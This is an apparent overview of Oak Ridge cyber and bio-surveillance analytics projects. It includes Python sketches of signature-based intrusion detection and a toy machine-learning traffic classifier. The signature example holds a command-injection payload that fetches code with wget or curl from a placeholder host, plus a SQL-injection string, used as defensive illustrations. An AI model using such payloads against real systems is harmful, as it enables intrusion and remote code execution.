Situ combines anomaly detection and data visualization in a distributed, streaming platform for discovering and explaining suspicious behavior, with the goal of enhancing situation awareness.
Security event data, such as intrusion detection system alerts, provide a starting point for analysis but are information-poor. To add context, analysts must manually gather and synthesize relevant data from myriad sources inside and outside their enterprise. They search system logs, network flows, and firewall data, as well as IP blacklists and reputation lists, software vulnerability information, malware and threat data, OS and application vendor blogs, and news sites. Relevant results must then be brought together to put the event in context and to support decisions about its importance and impact.
Modern computer network defense systems rely primarily on signature-based intrusion detection tools, which generate alerts when patterns predetermined to be malicious are encountered in network data streams. Signatures are created reactively, only after manual analysis of a network intrusion. As a result, these tools cannot detect new intrusions or variants of existing attacks, and their detectors cannot be adapted to the patterns unique to a particular network environment.
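To make the limitation concrete, the following is a minimal sketch of signature matching, assuming signatures are plain byte patterns searched for in a payload. The signature names, patterns, and payloads are invented for illustration and do not come from any real intrusion detection rule set.

```python
from typing import Dict, List

# Hypothetical signature set: names and byte patterns are invented for illustration.
SIGNATURES: Dict[str, bytes] = {
    "demo-shell-download": b"/bin/sh -c wget http://",
    "demo-sql-injection": b"' OR '1'='1",
}


def match_signatures(payload: bytes, signatures: Dict[str, bytes] = SIGNATURES) -> List[str]:
    """Return the names of all signatures whose pattern occurs in the payload."""
    return [name for name, pattern in signatures.items() if pattern in payload]


# A payload that contains a known pattern exactly as written in the signature.
known_attack = b"GET /cgi?cmd=/bin/sh -c wget http://example.invalid/x"

# A variant of the same idea: an extra space and a different download tool.
variant = b"GET /cgi?cmd=/bin/sh  -c curl http://example.invalid/x"

print(match_signatures(known_attack))  # the known pattern is flagged
print(match_signatures(variant))       # the variant matches nothing
```

In this sketch the variant differs from the known attack only superficially, yet it produces no alert until someone analyzes it and writes a new signature.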
The Oak Ridge Cyber Analytics (ORCA) Attack Variant Detector (AVD) is a sensor that uses machine learning to analyze behaviors in channels of communication between individual computers. Using examples of attack and non-attack traffic in the target environment, the ORCA sensor is trained to recognize and discriminate between malicious and normal traffic types. Because the learned model evaluates many interdependent metrics simultaneously, it captures distinctions that would be difficult for a human to code explicitly as a signature.
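The general idea of training on labeled attack and non-attack traffic can be sketched as follows. This is an illustration only: the description above does not say which learning algorithm or which metrics the ORCA sensor uses, so the sketch assumes a deliberately simple logistic regression over three hypothetical, pre-scaled per-channel metrics (bytes per packet, packets per second, distinct ports), with made-up training values.

```python
import math


def sigmoid(z):
    """Numerically stable logistic function."""
    if z >= 0:
        return 1.0 / (1.0 + math.exp(-z))
    e = math.exp(z)
    return e / (1.0 + e)


def train(samples, labels, lr=0.5, epochs=2000):
    """Fit logistic regression weights by batch gradient descent."""
    n = len(samples)
    weights = [0.0] * len(samples[0])
    bias = 0.0
    for _ in range(epochs):
        grad_w = [0.0] * len(weights)
        grad_b = 0.0
        for x, y in zip(samples, labels):
            # Prediction error for this sample under the current model.
            err = sigmoid(sum(w * xi for w, xi in zip(weights, x)) + bias) - y
            for i, xi in enumerate(x):
                grad_w[i] += err * xi
            grad_b += err
        weights = [w - lr * g / n for w, g in zip(weights, grad_w)]
        bias -= lr * grad_b / n
    return weights, bias


def attack_probability(model, x):
    """Score one channel: all metrics contribute jointly to a single probability."""
    weights, bias = model
    return sigmoid(sum(w * xi for w, xi in zip(weights, x)) + bias)


# Hypothetical training examples, each scaled to [0, 1]:
# (bytes per packet, packets per second, distinct ports)
NORMAL = [[0.2, 0.1, 0.1], [0.3, 0.2, 0.1], [0.25, 0.15, 0.2], [0.1, 0.2, 0.15]]
ATTACK = [[0.8, 0.9, 0.7], [0.7, 0.8, 0.9], [0.9, 0.7, 0.8], [0.85, 0.85, 0.75]]

MODEL = train(NORMAL + ATTACK, [0] * len(NORMAL) + [1] * len(ATTACK))

print(attack_probability(MODEL, [0.15, 0.15, 0.1]))  # resembles the normal examples
print(attack_probability(MODEL, [0.8, 0.8, 0.8]))    # resembles the attack examples
```

Unlike a fixed signature, the decision here comes from weights learned from traffic in the target environment, so retraining on local examples adapts the detector without anyone hand-writing a new rule. A linear model is the simplest possible choice and does not itself capture interactions between metrics; a production sensor would likely need a richer model.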
The Verification, Validation and Uncertainty Quantification (VVUQ) for machine learning project identified processes and techniques to conduct VVUQ on machine learning applications.
ORNL has played a key role in developing novel Big Data toolkits for syndromic disease surveillance. Our platform, the Oak Ridge Bio-surveillance Toolkit (ORBiT), enables large-scale analysis of heterogeneous data sources, including environmental data, climate and weather data, prescription records, and novel data streams emerging from social media (e.g., Twitter, Instagram). ORBiT focuses on developing novel statistical and machine learning tools rather than acting as a central data collection interface for these heterogeneous sources. It also provides an application programming interface (API) that end users can use to build specific bio-surveillance applications. Machine learning tools are tightly integrated with visualization tools in a web-based framework to help end users and analysts explore potential links between heterogeneous data sets, detect patterns and correlations across multiple data streams, identify emerging disease outbreaks, forecast emerging epidemics, and monitor control strategies. ORBiT is implemented as a component-based, plug-and-play toolkit that exploits existing distributed cloud-based analytics frameworks.